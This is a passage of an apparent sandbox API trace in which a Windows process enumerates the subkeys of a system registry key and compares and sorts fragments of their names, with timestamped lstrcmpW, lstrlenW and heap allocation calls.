| out: lpName="GroupOrderList") returned 0x0 [0032.350] lstrlenW (lpString="GroupOrderList") returned 14 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278090 [0032.350] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0032.350] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0032.350] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x2780b0 [0032.350] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0032.350] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0032.350] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0032.350] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x2780d0 [0032.350] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0032.350] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0032.350] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0032.350] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0032.350] lstrlenW (lpString="HAL") returned 3 [0032.350] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x2780f0 [0032.351] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0032.351] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0032.351] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0032.351] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0032.351] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0032.351] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0032.351] lstrlenW (lpString="IDConfigDB") returned 10 [0032.351] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d398 [0032.351] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0032.351] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0032.351] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0032.351] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0032.351] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0032.351] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x278110 [0032.351] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0032.351] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0032.351] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0032.351] lstrlenW (lpString="Keyboard Layout") returned 15 [0032.351] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d3c0 [0032.351] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0032.351] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0032.351] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0032.351] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0032.351] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0032.351] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0032.351] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d3e8 [0032.351] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0032.351] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0032.351] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0032.352] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0032.352] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0032.352] lstrlenW (lpString="Keyboard Layouts") returned 16 [0032.352] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d410 [0032.352] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0032.352] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0032.352] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27d410 | out: hHeap=0x260000) returned 1 [0032.352] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d410 [0032.352] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0032.352] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0032.352] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0032.352] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0032.352] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0032.352] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0032.352] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0032.352] lstrlenW (lpString="Lsa") returned 3 [0032.352] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278130 [0032.352] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0032.352] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0032.352] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0032.352] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0032.352] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0032.352] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0032.352] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0032.353] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0032.353] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278150 [0032.353] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0032.353] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278150 | out: hHeap=0x260000) returned 1 [0032.353] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x27d438 [0032.353] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0032.353] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0032.353] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d460 [0032.353] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0032.353] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0032.353] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0032.353] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0032.353] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0032.353] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0032.353] lstrlenW (lpString="LsaInformation") returned 14 [0032.353] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278150 [0032.353] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0032.353] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0032.353] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278150 | out: hHeap=0x260000) returned 1 [0032.353] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x24) returned 0x27df00 [0032.354] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0032.354] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0032.354] lstrlenW (lpString="MediaCategories") returned 15 [0032.354] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278150 [0032.354] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27df30 [0032.354] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0032.354] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0032.354] lstrlenW (lpString="MediaDRM") returned 8 [0032.354] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278170 [0032.354] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0032.354] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0032.354] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0032.354] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278170 | out: hHeap=0x260000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278170 [0032.354] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0032.354] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0032.354] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0032.354] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0032.354] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0032.354] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0032.354] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0032.354] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0032.355] lstrlenW (lpString="MediaInterfaces") returned 15 [0032.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278190 [0032.355] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0032.355] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0032.355] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278190 | out: hHeap=0x260000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27df60 [0032.355] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0032.355] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0032.355] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0032.355] lstrlenW (lpString="MediaProperties") returned 15 [0032.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278190 [0032.355] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0032.355] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0032.355] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0032.355] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278190 | out: hHeap=0x260000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27df90 [0032.355] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0032.355] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0032.355] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0032.355] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0032.355] lstrlenW (lpString="MediaTypes") returned 10 [0032.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278190 [0032.356] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0032.356] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0032.356] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0032.356] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0032.356] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0032.356] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0032.356] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278190 | out: hHeap=0x260000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278190 [0032.356] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0032.356] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0032.356] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0032.356] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0032.356] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0032.356] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0032.356] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0032.356] lstrlenW (lpString="MobilePC") returned 8 [0032.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d488 [0032.356] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0032.356] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0032.356] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0032.356] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0032.356] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0032.356] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0032.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x2781b0 [0032.356] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0032.356] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0032.356] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0032.356] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0032.356] lstrlenW (lpString="MPDEV") returned 5 [0032.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x2781d0 [0032.357] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0032.357] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0032.357] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0032.357] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0032.357] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0032.357] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0032.357] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0032.357] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0032.357] lstrlenW (lpString="MSDTC") returned 5 [0032.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x2781f0 [0032.357] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0032.357] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0032.357] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0032.357] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0032.357] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0032.357] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0032.357] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0032.357] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0032.357] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0032.357] lstrlenW (lpString="MUI") returned 3 [0032.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278210 [0032.357] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0032.357] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0032.357] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0032.357] lstrlenW (lpString="NetDiagFx") returned 9 [0032.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278230 [0032.358] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0032.358] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0032.358] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278250 [0032.358] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0032.358] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0032.358] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0032.358] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0032.358] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x278270 [0032.359] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0032.359] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0032.359] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0032.359] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0032.359] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0032.359] lstrlenW (lpString="NetTrace") returned 8 [0032.359] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278290 [0032.359] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0032.359] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0032.359] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0032.359] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0032.359] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0032.359] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0032.360] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0032.360] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0032.360] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0032.360] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0032.360] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278290 | out: hHeap=0x260000) returned 1 [0032.360] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278290 [0032.360] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0032.360] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0032.360] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0032.360] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0032.360] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0032.360] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0032.360] lstrlenW (lpString="Network") returned 7 [0032.360] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d4b0 [0032.360] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0032.360] lstrlenW (lpString="NetworkProvider") returned 15 [0032.360] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d4d8 [0032.360] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0032.360] lstrlenW (lpString="Nls") returned 3 [0032.360] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x2782b0 [0032.360] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0032.360] lstrlenW (lpString="NodeInterfaces") returned 14 [0032.360] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x2782d0 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0032.361] lstrlenW (lpString="Nsi") returned 3 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x2782f0 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0032.361] lstrlenW (lpString="PCW") returned 3 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278310 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0032.361] lstrlenW (lpString="PnP") returned 3 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x278330 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0032.361] lstrlenW (lpString="Power") returned 5 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278350 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0032.361] lstrlenW (lpString="Print") returned 5 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278370 [0032.361] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0032.361] lstrlenW (lpString="PriorityControl") returned 15 [0032.361] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d500 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0032.362] lstrlenW (lpString="ProductOptions") returned 14 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d528 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0032.362] lstrlenW (lpString="Remote Assistance") returned 17 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d578 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0032.362] lstrlenW (lpString="SafeBoot") returned 8 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278390 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0032.362] lstrlenW (lpString="ScsiPort") returned 8 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x2783d0 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0032.362] lstrlenW (lpString="SecurePipeServers") returned 17 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d5a0 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0032.362] lstrlenW (lpString="SecurityProviders") returned 17 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d5f0 [0032.362] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0032.362] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0032.362] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d640 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0032.363] lstrlenW (lpString="ServiceProvider") returned 15 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d668 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0032.363] lstrlenW (lpString="Session Manager") returned 15 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d668 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0032.363] lstrlenW (lpString="SNMP") returned 4 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x278430 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0032.363] lstrlenW (lpString="SQMServiceList") returned 14 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x22) returned 0x27dff0 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0032.363] lstrlenW (lpString="Srp") returned 3 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278450 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0032.363] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278470 [0032.363] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0032.363] lstrlenW (lpString="StillImage") returned 10 [0032.363] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278470 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0032.364] lstrlenW (lpString="Storage") returned 7 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d6b8 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0032.364] lstrlenW (lpString="SystemResources") returned 15 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d6e0 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x43, lpName=0x18fd58, 